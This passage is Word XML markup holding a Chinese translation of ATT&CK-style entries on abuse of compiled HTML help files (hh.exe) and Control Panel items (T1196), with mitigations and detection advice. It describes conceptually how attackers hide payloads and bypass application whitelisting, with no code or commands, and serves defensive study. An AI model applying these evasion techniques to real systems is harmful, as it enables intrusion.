      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(.chm)</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常作为微软帮助文档分发。</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CHM</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件通常压缩编译了多种文件，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档、图片以及程序脚本如</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VBA</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActiveX</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CHM</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的内容通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>帮助程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(hh.exe)</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IE</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>浏览器的底层组件显示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2540314A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00333366" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意程序可以利用这一技术隐藏恶意代码。一个嵌有</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的私有</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CHM</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件被受害者接收并被执行触发。</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CHM</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行在一些老的和未打补丁包的系统上可能绕过应用白名单机制，因为这些系统未将通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hh.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00333366">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载执行的应用程序加入应用白名单的审计。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAFAA78" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2263"/>
        <w:gridCol w:w="7473"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="33B2F41B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="302B751E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0E38CA3B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="38AD1B37" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="734B6BE6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CB1C3B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>禁止执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F774A52" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>考虑在某些系统或网络在非必要情况下通过应用白名单禁止</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>h</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>h.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>的执行以杜绝潜在的被恶意程序利用的风险。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E6AF7B2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="39434C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="40BB3382" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63F9E59E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="0056B3"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00050A61">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制来自网络的内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04EADA09" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>考虑禁止下载</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>传输以及执行一些不常见的文件类型如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>CHM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>，此类文件已知会被一些恶意程序利用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68B3CA75" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546AC83D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CB1C3B" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:r w:rsidRPr="00CB1C3B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控并分析</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1C3B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hh.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1C3B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的执行以及它的参数。将近期的调用和历史的合法参数做对比以发现异常的和潜在恶意的动作（如：混淆的以及恶意的命令）。非标准的进程调用树也意味着有嫌疑的和恶意的行为，比如</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1C3B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hh.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1C3B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是某些恶意进程的父进程，或是一些行为是已知的恶意行为。监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1C3B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CHM</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1C3B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件的状态及使用情况，特别是当它们不是环境中的常见文件时尤其当心。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F90AEEB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>控制面板</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>项</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>目</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="4AC7BF87" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C933049" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1196</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05B01BDE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>逃逸</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5029C1BB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CF9F19B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BB6BCDF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:lastRenderedPageBreak/>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，二进制文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>元数据</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>动态链接库监控</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>注册表，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>事件日志，进程命令行参数，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C7890B4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>是否支持远程：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>否</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78540D1F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>白名单，进程白名单</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B886642" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C0B77CE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F000AE8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制面板项目允许用户查看和调整计算机设置。控制面板项目是已注册的可执行（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）或控制面板（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.cpl</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）文件，后者实际上是重命名的动态链接库（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）文件，用于导出</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPlApplet</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数。控制面板项目可以直接从命令行执行，通过调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（应用程序编程接口）以编程方式执行，或者只需双击文件即可执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAF1D82" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了便于使用，控制面板项目通常包括已</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>注册</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>加载到控制面板</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、用户可用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的图形菜单</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0BB2AF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以将控制面板项目用作有效负载来执行任意命令。他们可以通过鱼叉式钓鱼攻击附件提供恶意控制面板项目，也可以将它们作为多级恶意软件的一部分执行。控制面板项目，尤其是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，也可能绕过应用和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或文件扩展名白名单。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D2AEB9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2263"/>
        <w:gridCol w:w="7473"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="613C16AB" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6885F686" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="764F74AD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
